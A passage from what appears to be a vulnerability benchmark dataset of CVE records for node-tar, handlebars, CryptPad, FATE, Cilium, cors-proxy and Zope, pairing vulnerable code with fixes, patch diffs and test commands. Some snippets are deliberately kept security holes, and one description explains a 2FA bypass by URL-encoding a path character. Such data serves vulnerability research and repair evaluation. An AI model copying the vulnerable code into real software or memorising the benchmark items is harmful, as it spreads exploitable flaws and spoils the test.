set.concat(normPath(join(set[set.length - 1], path)))\n- : [path], [])\n+ // '/a/b/c/d' -> ['/', '/a', '/a/b', '/a/b/c', '/a/b/c/d']\n+ const getDirs = path => {\n+ const dirs = path.split('/').slice(0, -1).reduce((set, path) => {\n+ if (set.length)\n+ path = normPath(join(set[set.length - 1], path))\n+ set.push(path || '/')\n+ return set\n+ }, [])\n+ return dirs\n+ }\n \n // functions currently running\n const running = new Set()\n@@ -87,7 +93,18 @@\n }\n \n const reserve = (paths, fn) => {\n- paths = paths.map(p => normPath(join(p)).toLowerCase())\n+ // collide on matches across case and unicode normalization\n+ // On windows, thanks to the magic of 8.3 shortnames, it is fundamentally\n+ // impossible to determine whether two paths refer to the same thing on\n+ // disk, without asking the kernel for a shortname.\n+ // So, we just pretend that every path matches every other path here,\n+ // effectively removing all parallelization on windows.\n+ paths = isWindows ? ['win32 parallelization disabled'] : paths.map(p => {\n+ return stripSlashes(normPath(join(p)))\n+ .normalize('NFKD')\n+ .toLowerCase()\n+ })\n+\n const dirs = new Set(\n paths.map(path => getDirs(path)).reduce((a, b) => a.concat(b))\n )\n\n--- /dev/null\n+++ b/lib/path-reservations.js\n@@ -0,0 +1,2 @@\n+const platform = process.env.TESTING_TAR_FAKE_PLATFORM || process.platform\n+const isWindows = platform === 'win32'\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2021-37712:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/node-tar\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\nnode test/path-reservations.js\n", "unit_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2021-37712:latest\n# bash /workspace/unit_test.sh\nset -e\n\ncd /workspace/node-tar\ngit apply --whitespace=nowarn /workspace/fix.patch\nnode test/path-reservations.js\n"} {"cve_id": "CVE-2021-23369", "cve_description": "The package handlebars before 4.7.7 is vulnerable to Remote Code Execution (RCE) when selecting certain compiling options to compile templates coming from an untrusted source.", "cwe_info": {"CWE-94": {"name": "Improper Control of Generation of Code ('Code Injection')", "description": "The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment."}, "CWE-77": {"name": "Improper Neutralization of Special Elements used in a Command ('Command Injection')", "description": "The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component."}, "CWE-78": {"name": "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')", "description": "The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component."}}, "repo": "https://github.com/handlebars-lang/handlebars.js", "patch_url": ["https://github.com/handlebars-lang/handlebars.js/commit/b6d3de7123eebba603e321f04afdbae608e8fea8",
"https://github.com/handlebars-lang/handlebars.js/commit/f0589701698268578199be25285b2ebea1c1e427"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_92_1", "commit": "f058970", "file_path": "lib/handlebars/runtime.js", "start_line": "121", "end_line": "128", "snippet": " strict: function(obj, name, loc) {\n if (!obj || !(name in obj)) {\n throw new Exception('\"' + name + '\" not defined in ' + obj, {\n loc: loc\n });\n }\n return obj[name];\n },"}], "fix_func": [{"id": "fix_js_92_1", "commit": "b6d3de7", "file_path": "lib/handlebars/runtime.js", "start_line": "121", "end_line": "128", "snippet": " strict: function(obj, name, loc) {\n if (!obj || !(name in obj)) {\n throw new Exception('\"' + name + '\" not defined in ' + obj, {\n loc: loc\n });\n }\n return container.lookupProperty(obj, name);\n },"}], "vul_patch": "--- a/lib/handlebars/runtime.js\n+++ b/lib/handlebars/runtime.js\n@@ -4,5 +4,5 @@\n loc: loc\n });\n }\n- return obj[name];\n+ return container.lookupProperty(obj, name);\n },\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2025-49591", "cve_description": "CryptPad is a collaboration suite. Prior to version 2025.3.0, enforcement of Two-Factor Authentication (2FA) in CryptPad can be trivially bypassed, due to weak implementation of access controls. An attacker that compromises a user's credentials can gain access to the victim's account, even if the victim has 2FA set up. This is due to 2FA not being enforced if the path parameter is not 44 characters long, which can be bypassed by simply URL encoding a single character in the path. This issue has been patched in version 2025.3.0.", "cwe_info": {"CWE-287": {"name": "Improper Authentication", "description": "When an actor claims to have a given identity, the product does not prove or insufficiently proves that the claim is correct."}}, "repo": "https://github.com/cryptpad/cryptpad", "patch_url": ["https://github.com/cryptpad/cryptpad/commit/0c5d4bbf5e5206d53470ea86a664fa2b703fb611"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_133_1", "commit": "77b46f6", "file_path": "lib/http-worker.js", "start_line": 356, "end_line": 509, "snippet": "app.use('/block/', function (req, res, next) {\n var parsed = Path.parse(req.url);\n var name = parsed.name;\n // block access control only applies to files\n // identified by base64-encoded public keys\n // skip everything else, ie. /block/placeholder.txt\n if (typeof(name) !== 'string' || name.length !== 44) {\n return void res.status(404).json({\n error: \"INVALID_ID\",\n });\n }\n\n var authorization = req.headers.authorization;\n\n var mfa_params, sso_params;\n nThen(function (w) {\n // First, check whether the block id in question has any MFA settings stored\n MFA.read(Env, name, w(function (err, content) {\n // ENOENT means there are no settings configured\n // it could be a 404 or an existing block without MFA protection\n // in either case you can abort and fall through\n // allowing the static webserver to handle either case\n if (err && err.code === 'ENOENT') {\n return;\n }\n\n // we're not expecting other errors. the sensible thing is to fail\n // closed - meaning assume some protection is in place but that\n // the settings couldn't be loaded for some reason. 
block access\n // to the resource, logging for the admin and responding to the client\n // with a vague error code\n if (err) {\n Log.error('GET_BLOCK_METADATA', err);\n return void res.status(500).json({\n code: 500,\n error: \"UNEXPECTED_ERROR\",\n });\n }\n\n // Otherwise, some settings were loaded correctly.\n // We're expecting stringified JSON, so try to parse it.\n // Log and respond with an error again if this fails.\n // If it parses successfully then fall through to the next block.\n try {\n mfa_params = JSON.parse(content);\n } catch (err2) {\n w.abort();\n Log.error(\"INVALID_BLOCK_METADATA\", err2);\n return res.status(500).json({\n code: 500,\n error: \"UNEXPECTED_ERROR\",\n });\n }\n }));\n\n // Same for SSO settings\n if (!SSOUtils) { return; }\n SSOUtils.readBlock(Env, name, w(function (err, content) {\n if (err && (err.code === 'ENOENT' || err === 'ENOENT')) {\n return;\n }\n if (err) {\n Log.error('GET_BLOCK_METADATA', err);\n return void res.status(500).json({\n code: 500,\n error: \"UNEXPECTED_ERROR\",\n });\n }\n sso_params = content;\n }));\n }).nThen(function (w) {\n if (!mfa_params && !sso_params) {\n w.abort();\n next();\n }\n }).nThen(function (w) {\n // We should only be able to reach this logic\n // if we successfully loaded and parsed some JSON\n // representing the user's MFA and/or SSO settings.\n\n // Failures at this point relate to insufficient or incorrect authorization.\n // This function standardizes how we reject such requests.\n\n // So far the only additional factor which is supported is TOTP.\n // We specify what the method is to allow for future alternatives\n // and inform the client so they can determine how to respond\n // \"401\" means \"Unauthorized\"\n var no = function () {\n w.abort();\n res.status(401).json({\n sso: Boolean(sso_params),\n method: mfa_params && mfa_params.method,\n code: 401\n });\n };\n\n // if you are here it is because this block is protected by MFA or SSO.\n // they will need to provide a JSON Web Token, so we can reject them outright\n // if one is not present in their authorization header\n if (!authorization) { return void no(); }\n\n // The authorization header should be of the form\n // \"Authorization: Bearer \"\n // We can reject the request if it is malformed.\n let token = authorization.replace(/^Bearer\\s+/, '').trim();\n if (!token) { return void no(); }\n\n Sessions.read(Env, name, token, function (err, contentStr) {\n if (err) {\n Log.error('SESSION_READ_ERROR', err);\n return res.status(401).json({\n sso: Boolean(sso_params),\n method: mfa_params && mfa_params.method,\n code: 401,\n });\n }\n\n let content = Util.tryParse(contentStr);\n\n if (mfa_params && !content.mfa) { return void no(); }\n if (sso_params && !content.sso) { return void no(); }\n\n if (content.mfa && content.mfa.exp && (+new Date()) > content.mfa.exp) {\n Log.error(\"OTP_SESSION_EXPIRED\", content.mfa);\n Sessions.delete(Env, name, token, function (err) {\n if (err) {\n Log.error('SESSION_DELETE_EXPIRED_ERROR', err);\n return;\n }\n Log.info('SESSION_DELETE_EXPIRED', err);\n });\n return void no();\n }\n\n\n if (content.sso && content.sso.exp && (+new Date()) > content.sso.exp) {\n Log.error(\"SSO_SESSION_EXPIRED\", content.sso);\n Sessions.delete(Env, name, token, function (err) {\n if (err) {\n Log.error('SSO_SESSION_DELETE_EXPIRED_ERROR', err);\n return;\n }\n Log.info('SSO_SESSION_DELETE_EXPIRED', err);\n });\n return void no();\n }\n\n // Interpret the existence of a file in that location as the continued\n // validity of the 
session. Fall through and let the built-in webserver\n // handle the 404 or serving the file.\n next();\n });\n });\n});"}], "fix_func": [{"id": "fix_js_133_1", "commit": "0c5d4bb", "file_path": "lib/http-worker.js", "start_line": 356, "end_line": 512, "snippet": "app.use('/block/', function (req, res, next) {\n var parsed = Path.parse(req.url);\n var name = parsed.name;\n // block access control only applies to files\n // identified by base64-encoded public keys\n // skip everything else, ie. /block/placeholder.txt\n if (/placeholder\\.txt(\\?.+)?/.test(parsed.base)) {\n return void next();\n }\n if (typeof(name) !== 'string' || name.length !== 44) {\n return void res.status(404).json({\n error: \"INVALID_ID\",\n });\n }\n\n var authorization = req.headers.authorization;\n\n var mfa_params, sso_params;\n nThen(function (w) {\n // First, check whether the block id in question has any MFA settings stored\n MFA.read(Env, name, w(function (err, content) {\n // ENOENT means there are no settings configured\n // it could be a 404 or an existing block without MFA protection\n // in either case you can abort and fall through\n // allowing the static webserver to handle either case\n if (err && err.code === 'ENOENT') {\n return;\n }\n\n // we're not expecting other errors. the sensible thing is to fail\n // closed - meaning assume some protection is in place but that\n // the settings couldn't be loaded for some reason. block access\n // to the resource, logging for the admin and responding to the client\n // with a vague error code\n if (err) {\n Log.error('GET_BLOCK_METADATA', err);\n return void res.status(500).json({\n code: 500,\n error: \"UNEXPECTED_ERROR\",\n });\n }\n\n // Otherwise, some settings were loaded correctly.\n // We're expecting stringified JSON, so try to parse it.\n // Log and respond with an error again if this fails.\n // If it parses successfully then fall through to the next block.\n try {\n mfa_params = JSON.parse(content);\n } catch (err2) {\n w.abort();\n Log.error(\"INVALID_BLOCK_METADATA\", err2);\n return res.status(500).json({\n code: 500,\n error: \"UNEXPECTED_ERROR\",\n });\n }\n }));\n\n // Same for SSO settings\n if (!SSOUtils) { return; }\n SSOUtils.readBlock(Env, name, w(function (err, content) {\n if (err && (err.code === 'ENOENT' || err === 'ENOENT')) {\n return;\n }\n if (err) {\n Log.error('GET_BLOCK_METADATA', err);\n return void res.status(500).json({\n code: 500,\n error: \"UNEXPECTED_ERROR\",\n });\n }\n sso_params = content;\n }));\n }).nThen(function (w) {\n if (!mfa_params && !sso_params) {\n w.abort();\n next();\n }\n }).nThen(function (w) {\n // We should only be able to reach this logic\n // if we successfully loaded and parsed some JSON\n // representing the user's MFA and/or SSO settings.\n\n // Failures at this point relate to insufficient or incorrect authorization.\n // This function standardizes how we reject such requests.\n\n // So far the only additional factor which is supported is TOTP.\n // We specify what the method is to allow for future alternatives\n // and inform the client so they can determine how to respond\n // \"401\" means \"Unauthorized\"\n var no = function () {\n w.abort();\n res.status(401).json({\n sso: Boolean(sso_params),\n method: mfa_params && mfa_params.method,\n code: 401\n });\n };\n\n // if you are here it is because this block is protected by MFA or SSO.\n // they will need to provide a JSON Web Token, so we can reject them outright\n // if one is not present in their authorization header\n if 
(!authorization) { return void no(); }\n\n // The authorization header should be of the form\n // \"Authorization: Bearer \"\n // We can reject the request if it is malformed.\n let token = authorization.replace(/^Bearer\\s+/, '').trim();\n if (!token) { return void no(); }\n\n Sessions.read(Env, name, token, function (err, contentStr) {\n if (err) {\n Log.error('SESSION_READ_ERROR', err);\n return res.status(401).json({\n sso: Boolean(sso_params),\n method: mfa_params && mfa_params.method,\n code: 401,\n });\n }\n\n let content = Util.tryParse(contentStr);\n\n if (mfa_params && !content.mfa) { return void no(); }\n if (sso_params && !content.sso) { return void no(); }\n\n if (content.mfa && content.mfa.exp && (+new Date()) > content.mfa.exp) {\n Log.error(\"OTP_SESSION_EXPIRED\", content.mfa);\n Sessions.delete(Env, name, token, function (err) {\n if (err) {\n Log.error('SESSION_DELETE_EXPIRED_ERROR', err);\n return;\n }\n Log.info('SESSION_DELETE_EXPIRED', err);\n });\n return void no();\n }\n\n\n if (content.sso && content.sso.exp && (+new Date()) > content.sso.exp) {\n Log.error(\"SSO_SESSION_EXPIRED\", content.sso);\n Sessions.delete(Env, name, token, function (err) {\n if (err) {\n Log.error('SSO_SESSION_DELETE_EXPIRED_ERROR', err);\n return;\n }\n Log.info('SSO_SESSION_DELETE_EXPIRED', err);\n });\n return void no();\n }\n\n // Interpret the existence of a file in that location as the continued\n // validity of the session. Fall through and let the built-in webserver\n // handle the 404 or serving the file.\n next();\n });\n });\n});"}], "vul_patch": "--- a/lib/http-worker.js\n+++ b/lib/http-worker.js\n@@ -4,6 +4,9 @@\n // block access control only applies to files\n // identified by base64-encoded public keys\n // skip everything else, ie. /block/placeholder.txt\n+ if (/placeholder\\.txt(\\?.+)?/.test(parsed.base)) {\n+ return void next();\n+ }\n if (typeof(name) !== 'string' || name.length !== 44) {\n return void res.status(404).json({\n error: \"INVALID_ID\",\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2020-25459", "cve_description": "An issue was discovered in function sync_tree in hetero_decision_tree_guest.py in WeBank FATE (Federated AI Technology Enabler) 0.1 through 1.4.2 allows attackers to read sensitive information during the training process of machine learning joint modeling.", "cwe_info": {"CWE-668": {"name": "Exposure of Resource to Wrong Sphere", "description": "The product exposes a resource to the wrong control sphere, providing unintended actors with inappropriate access to the resource."}}, "repo": "https://github.com/FederatedAI/FATE", "patch_url": ["https://github.com/FederatedAI/FATE/commit/6feccf6d752184a6f9365d56a76fe627983e7139"], "programing_language": "Python", "vul_func": [{"id": "vul_py_44_1", "commit": "67708d5", "file_path": "federatedml/tree/hetero/hetero_decision_tree_guest.py", "start_line": 532, "end_line": 544, "snippet": " def sync_tree(self):\n LOGGER.info(\"sync tree to host\")\n\n self.transfer_inst.tree.remote(self.tree_,\n role=consts.HOST,\n idx=-1)\n \"\"\"\n federation.remote(obj=self.tree_,\n name=self.transfer_inst.tree.name,\n tag=self.transfer_inst.generate_transferid(self.transfer_inst.tree),\n role=consts.HOST,\n idx=-1)\n \"\"\""}], "fix_func": [{"id": "fix_py_44_1", "commit": "6feccf6", "file_path": "federatedml/tree/hetero/hetero_decision_tree_guest.py", "start_line": 544, "end_line": 557, "snippet": " def sync_tree(self):\n LOGGER.info(\"sync tree to host\")\n\n tree_nodes = self.remove_sensitive_info()\n 
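# NOTE: remove_sensitive_info() is defined elsewhere in this class; it is assumed to return a copy of self.tree_ with guest-only node data (e.g. leaf weights) cleared, so the host cannot recover label information -- the leak addressed by this CVE.\n 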
self.transfer_inst.tree.remote(tree_nodes,\n role=consts.HOST,\n idx=-1)\n \"\"\"\n federation.remote(obj=self.tree_,\n name=self.transfer_inst.tree.name,\n tag=self.transfer_inst.generate_transferid(self.transfer_inst.tree),\n role=consts.HOST,\n idx=-1)\n \"\"\""}, {"id": "fix_py_44_2", "commit": "6feccf6", "file_path": "federatedml/tree/hetero/hetero_decision_tree_host.py", "start_line": 532, "end_line": 542, "snippet": " return model_param\n\n def set_model_param(self, model_param):\n self.tree_ = []\n for node_param in model_param.tree_:\n _node = Node(id=node_param.id,\n sitename=node_param.sitename,\n fid=node_param.fid,\n bid=node_param.bid,\n weight=node_param.weight,\n is_leaf=node_param.is_leaf,"}], "vul_patch": "--- a/federatedml/tree/hetero/hetero_decision_tree_guest.py\n+++ b/federatedml/tree/hetero/hetero_decision_tree_guest.py\n@@ -1,7 +1,8 @@\n def sync_tree(self):\n LOGGER.info(\"sync tree to host\")\n \n- self.transfer_inst.tree.remote(self.tree_,\n+ tree_nodes = self.remove_sensitive_info()\n+ self.transfer_inst.tree.remote(tree_nodes,\n role=consts.HOST,\n idx=-1)\n \"\"\"\n\n--- /dev/null\n+++ b/federatedml/tree/hetero/hetero_decision_tree_guest.py\n@@ -0,0 +1,11 @@\n+ return model_param\n+\n+ def set_model_param(self, model_param):\n+ self.tree_ = []\n+ for node_param in model_param.tree_:\n+ _node = Node(id=node_param.id,\n+ sitename=node_param.sitename,\n+ fid=node_param.fid,\n+ bid=node_param.bid,\n+ weight=node_param.weight,\n+ is_leaf=node_param.is_leaf,\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2020-25459:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/FATE\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\n/workspace/PoC_env/CVE-2020-25459/bin/python hand_test.py\n", "unit_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2020-25459:latest\n# bash /workspace/unit_test.sh\nset -e\n\ncd /workspace/FATE\ngit apply --whitespace=nowarn /workspace/fix.patch\n/workspace/PoC_env/CVE-2020-25459/bin/python -m pytest federatedml/tree/test/ -v"} {"cve_id": "CVE-2024-42488", "cve_description": "Cilium is a networking, observability, and security solution with an eBPF-based dataplane. Prior to versions 1.14.14 and 1.15.8, a race condition in the Cilium agent can cause the agent to ignore labels that should be applied to a node. This could in turn cause CiliumClusterwideNetworkPolicies intended for nodes with the ignored label to not apply, leading to policy bypass. 
This issue has been patched in Cilium v1.14.14 and v1.15.8 As the underlying issue depends on a race condition, users unable to upgrade can restart the Cilium agent on affected nodes until the affected policies are confirmed to be working as expected.", "cwe_info": {"CWE-362": {"name": "Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')", "description": "The product contains a concurrent code sequence that requires temporary, exclusive access to a shared resource, but a timing window exists in which the shared resource can be modified by another code sequence operating concurrently."}}, "repo": "https://github.com/cilium/cilium", "patch_url": ["https://github.com/cilium/cilium/commit/aa44dd148a9be95e07782e4f990e61678ef0abf8"], "programing_language": "Go", "vul_func": [{"id": "vul_go_295_1", "commit": "fdb97702d2fdff51b01aad8c4948f33dab7c2513", "file_path": "pkg/endpointmanager/host.go", "start_line": 32, "end_line": 41, "snippet": "func (mgr *endpointManager) startNodeLabelsObserver(old map[string]string) {\n\tmgr.localNodeStore.Observe(context.Background(), func(ln node.LocalNode) {\n\t\tif maps.Equal(old, ln.Labels) {\n\t\t\treturn\n\t\t}\n\n\t\tmgr.updateHostEndpointLabels(old, ln.Labels)\n\t\told = ln.Labels\n\t}, func(error) { /* Executed only when we are shutting down */ })\n}"}, {"id": "vul_go_295_2", "commit": "fdb97702d2fdff51b01aad8c4948f33dab7c2513", "file_path": "pkg/endpointmanager/host.go", "start_line": 43, "end_line": 58, "snippet": "func (mgr *endpointManager) updateHostEndpointLabels(oldNodeLabels, newNodeLabels map[string]string) {\n\tnodeEP := mgr.GetHostEndpoint()\n\tif nodeEP == nil {\n\t\tlog.Error(\"Host endpoint not found\")\n\t\treturn\n\t}\n\n\terr := nodeEP.UpdateLabelsFrom(oldNodeLabels, newNodeLabels, labels.LabelSourceK8s)\n\tif err != nil {\n\t\t// An error can only occur if either the endpoint is terminating, or the\n\t\t// old labels are not found. Both are impossible, hence there's no point\n\t\t// in retrying.\n\t\tlog.WithError(err).Error(\"Unable to update host endpoint labels\")\n\t\treturn\n\t}\n}"}], "fix_func": [{"id": "fix_go_295_1", "commit": "aa44dd148a9be95e07782e4f990e61678ef0abf8", "file_path": "pkg/endpointmanager/host.go", "start_line": 32, "end_line": 46, "snippet": "func (mgr *endpointManager) startNodeLabelsObserver(old map[string]string) {\n\tmgr.localNodeStore.Observe(context.Background(), func(ln node.LocalNode) {\n\t\tif maps.Equal(old, ln.Labels) {\n\t\t\treturn\n\t\t}\n\n\t\tif mgr.updateHostEndpointLabels(old, ln.Labels) {\n\t\t\t// Endpoint's label update logic rejects a request if any of the old labels are\n\t\t\t// not present in the endpoint manager's state. 
So, overwrite old labels only if\n\t\t\t// the update is successful to avoid node labels being outdated indefinitely (GH-29649).\n\t\t\told = ln.Labels\n\t\t}\n\n\t}, func(error) { /* Executed only when we are shutting down */ })\n}"}, {"id": "fix_go_295_2", "commit": "aa44dd148a9be95e07782e4f990e61678ef0abf8", "file_path": "pkg/endpointmanager/host.go", "start_line": 50, "end_line": 65, "snippet": "func (mgr *endpointManager) updateHostEndpointLabels(oldNodeLabels, newNodeLabels map[string]string) bool {\n\tnodeEP := mgr.GetHostEndpoint()\n\tif nodeEP == nil {\n\t\tlog.Error(\"Host endpoint not found\")\n\t\treturn false\n\t}\n\n\tif err := nodeEP.UpdateLabelsFrom(oldNodeLabels, newNodeLabels, labels.LabelSourceK8s); err != nil {\n\t\t// An error can only occur if either the endpoint is terminating, or the\n\t\t// old labels are not found. Both are impossible, hence there's no point\n\t\t// in retrying.\n\t\tlog.WithError(err).Error(\"Unable to update host endpoint labels\")\n\t\treturn false\n\t}\n\treturn true\n}"}], "vul_patch": "--- a/pkg/endpointmanager/host.go\n+++ b/pkg/endpointmanager/host.go\n@@ -4,7 +4,12 @@\n \t\t\treturn\n \t\t}\n \n-\t\tmgr.updateHostEndpointLabels(old, ln.Labels)\n-\t\told = ln.Labels\n+\t\tif mgr.updateHostEndpointLabels(old, ln.Labels) {\n+\t\t\t// Endpoint's label update logic rejects a request if any of the old labels are\n+\t\t\t// not present in the endpoint manager's state. So, overwrite old labels only if\n+\t\t\t// the update is successful to avoid node labels being outdated indefinitely (GH-29649).\n+\t\t\told = ln.Labels\n+\t\t}\n+\n \t}, func(error) { /* Executed only when we are shutting down */ })\n }\n\n--- a/pkg/endpointmanager/host.go\n+++ b/pkg/endpointmanager/host.go\n@@ -1,16 +1,16 @@\n-func (mgr *endpointManager) updateHostEndpointLabels(oldNodeLabels, newNodeLabels map[string]string) {\n+func (mgr *endpointManager) updateHostEndpointLabels(oldNodeLabels, newNodeLabels map[string]string) bool {\n \tnodeEP := mgr.GetHostEndpoint()\n \tif nodeEP == nil {\n \t\tlog.Error(\"Host endpoint not found\")\n-\t\treturn\n+\t\treturn false\n \t}\n \n-\terr := nodeEP.UpdateLabelsFrom(oldNodeLabels, newNodeLabels, labels.LabelSourceK8s)\n-\tif err != nil {\n+\tif err := nodeEP.UpdateLabelsFrom(oldNodeLabels, newNodeLabels, labels.LabelSourceK8s); err != nil {\n \t\t// An error can only occur if either the endpoint is terminating, or the\n \t\t// old labels are not found. 
Both are impossible, hence there's no point\n \t\t// in retrying.\n \t\tlog.WithError(err).Error(\"Unable to update host endpoint labels\")\n-\t\treturn\n+\t\treturn false\n \t}\n+\treturn true\n }\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2021-23664", "cve_description": "The package @isomorphic-git/cors-proxy before 2.7.1 is vulnerable to Server-side Request Forgery (SSRF) due to missing sanitization and validation of the redirection action in middleware.js.", "cwe_info": {"CWE-918": {"name": "Server-Side Request Forgery (SSRF)", "description": "The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination."}}, "repo": "https://github.com/isomorphic-git/cors-proxy", "patch_url": ["https://github.com/isomorphic-git/cors-proxy/commit/1b1c91e71d946544d97ccc7cf0ac62b859e03311"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_239_1", "commit": "617b73f", "file_path": "middleware.js", "start_line": 102, "end_line": 153, "snippet": " function middleware (req, res) {\n let u = url.parse(req.url, true)\n\n\n let headers = {}\n for (let h of allowHeaders) {\n if (req.headers[h]) {\n headers[h] = req.headers[h]\n }\n }\n\n // GitHub uses user-agent sniffing for git/* and changes its behavior which is frustrating\n if (!headers['user-agent'] || !headers['user-agent'].startsWith('git/')) {\n headers['user-agent'] = 'git/@isomorphic-git/cors-proxy'\n }\n\n let p = u.path\n let parts = p.match(/\\/([^\\/]*)\\/(.*)/)\n let pathdomain = parts[1]\n let remainingpath = parts[2]\n let protocol = insecure_origins.includes(pathdomain) ? 'http' : 'https'\n\n fetch(\n `${protocol}://${pathdomain}/${remainingpath}`,\n {\n method: req.method,\n headers,\n body: (req.method !== 'GET' && req.method !== 'HEAD') ? 
req : undefined\n }\n ).then(f => {\n res.statusCode = f.status\n for (let h of exposeHeaders) {\n if (h === 'content-length') continue\n if (f.headers.has(h)) {\n res.setHeader(h, f.headers.get(h))\n }\n }\n if (f.redirected) {\n res.setHeader('x-redirected-url', f.url)\n }\n f.body.pipe(res)\n })\n }\n const cors = microCors({\n allowHeaders,\n exposeHeaders,\n allowMethods,\n allowCredentials: false,\n origin\n })\n return filter(predicate, cors(compose(sendCorsOK, authorization, middleware)))\n}"}, {"id": "vul_js_239_2", "commit": "617b73f", "file_path": "middleware.js", "start_line": 27, "end_line": 44, "snippet": "const exposeHeaders = [\n 'accept-ranges',\n 'age',\n 'cache-control',\n 'content-length',\n 'content-language',\n 'content-type',\n 'date',\n 'etag',\n 'expires',\n 'last-modified',\n 'pragma',\n 'server',\n 'transfer-encoding',\n 'vary',\n 'x-github-request-id',\n 'x-redirected-url',\n]"}], "fix_func": [{"id": "fix_js_239_1", "commit": "1b1c91e71d946544d97ccc7cf0ac62b859e03311", "file_path": "middleware.js", "start_line": 103, "end_line": 160, "snippet": " function middleware (req, res) {\n let u = url.parse(req.url, true)\n\n\n let headers = {}\n for (let h of allowHeaders) {\n if (req.headers[h]) {\n headers[h] = req.headers[h]\n }\n }\n\n // GitHub uses user-agent sniffing for git/* and changes its behavior which is frustrating\n if (!headers['user-agent'] || !headers['user-agent'].startsWith('git/')) {\n headers['user-agent'] = 'git/@isomorphic-git/cors-proxy'\n }\n\n let p = u.path\n let parts = p.match(/\\/([^\\/]*)\\/(.*)/)\n let pathdomain = parts[1]\n let remainingpath = parts[2]\n let protocol = insecure_origins.includes(pathdomain) ? 'http' : 'https'\n\n fetch(\n `${protocol}://${pathdomain}/${remainingpath}`,\n {\n method: req.method,\n redirect: 'manual',\n headers,\n body: (req.method !== 'GET' && req.method !== 'HEAD') ? req : undefined\n }\n ).then(f => {\n if (f.headers.has('location')) {\n // Modify the location so the client continues to use the proxy\n let newUrl = f.headers.get('location').replace(/^https?:\\//, '')\n f.headers.set('location', newUrl)\n }\n res.statusCode = f.status\n for (let h of exposeHeaders) {\n if (h === 'content-length') continue\n if (f.headers.has(h)) {\n res.setHeader(h, f.headers.get(h))\n }\n }\n if (f.redirected) {\n res.setHeader('x-redirected-url', f.url)\n }\n f.body.pipe(res)\n })\n }\n const cors = microCors({\n allowHeaders,\n exposeHeaders,\n allowMethods,\n allowCredentials: false,\n origin\n })\n return filter(predicate, cors(compose(sendCorsOK, authorization, middleware)))\n}"}, {"id": "fix_js_239_2", "commit": "1b1c91e71d946544d97ccc7cf0ac62b859e03311", "file_path": "middleware.js", "start_line": 27, "end_line": 45, "snippet": "const exposeHeaders = [\n 'accept-ranges',\n 'age',\n 'cache-control',\n 'content-length',\n 'content-language',\n 'content-type',\n 'date',\n 'etag',\n 'expires',\n 'last-modified',\n 'location',\n 'pragma',\n 'server',\n 'transfer-encoding',\n 'vary',\n 'x-github-request-id',\n 'x-redirected-url',\n]"}], "vul_patch": "--- a/middleware.js\n+++ b/middleware.js\n@@ -24,10 +24,16 @@\n `${protocol}://${pathdomain}/${remainingpath}`,\n {\n method: req.method,\n+ redirect: 'manual',\n headers,\n body: (req.method !== 'GET' && req.method !== 'HEAD') ? 
req : undefined\n }\n ).then(f => {\n+ if (f.headers.has('location')) {\n+ // Modify the location so the client continues to use the proxy\n+ let newUrl = f.headers.get('location').replace(/^https?:\\//, '')\n+ f.headers.set('location', newUrl)\n+ }\n res.statusCode = f.status\n for (let h of exposeHeaders) {\n if (h === 'content-length') continue\n\n--- a/middleware.js\n+++ b/middleware.js\n@@ -9,6 +9,7 @@\n 'etag',\n 'expires',\n 'last-modified',\n+ 'location',\n 'pragma',\n 'server',\n 'transfer-encoding',\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2021-32633", "cve_description": "Zope is an open-source web application server. In Zope versions prior to 4.6 and 5.2, users can access untrusted modules indirectly through Python modules that are available for direct use. By default, only users with the Manager role can add or edit Zope Page Templates through the web, but sites that allow untrusted users to add/edit Zope Page Templates through the web are at risk from this vulnerability. The problem has been fixed in Zope 5.2 and 4.6. As a workaround, a site administrator can restrict adding/editing Zope Page Templates through the web using the standard Zope user/role permission mechanisms. Untrusted users should not be assigned the Zope Manager role and adding/editing Zope Page Templates through the web should be restricted to trusted users only.", "cwe_info": {"CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/zopefoundation/Zope", "patch_url": ["https://github.com/zopefoundation/Zope/commit/1f8456bf1f908ea46012537d52bd7e752a532c91"], "programing_language": "Python", "vul_func": [{"id": "vul_py_145_1", "commit": "1746d5a", "file_path": "src/Products/PageTemplates/Expressions.py", "start_line": 64, "end_line": 82, "snippet": "def boboAwareZopeTraverse(object, path_items, econtext):\n \"\"\"Traverses a sequence of names, first trying attributes then items.\n\n This uses zope.traversing path traversal where possible and interacts\n correctly with objects providing OFS.interface.ITraversable when\n necessary (bobo-awareness).\n \"\"\"\n request = getattr(econtext, 'request', None)\n path_items = list(path_items)\n path_items.reverse()\n\n while path_items:\n name = path_items.pop()\n if OFS.interfaces.ITraversable.providedBy(object):\n object = object.restrictedTraverse(name)\n else:\n object = traversePathElement(object, name, path_items,\n request=request)\n return object"}, {"id": "vul_py_145_2", "commit": "1746d5a", "file_path": "src/Products/PageTemplates/expression.py", "start_line": 56, "end_line": 70, "snippet": " def 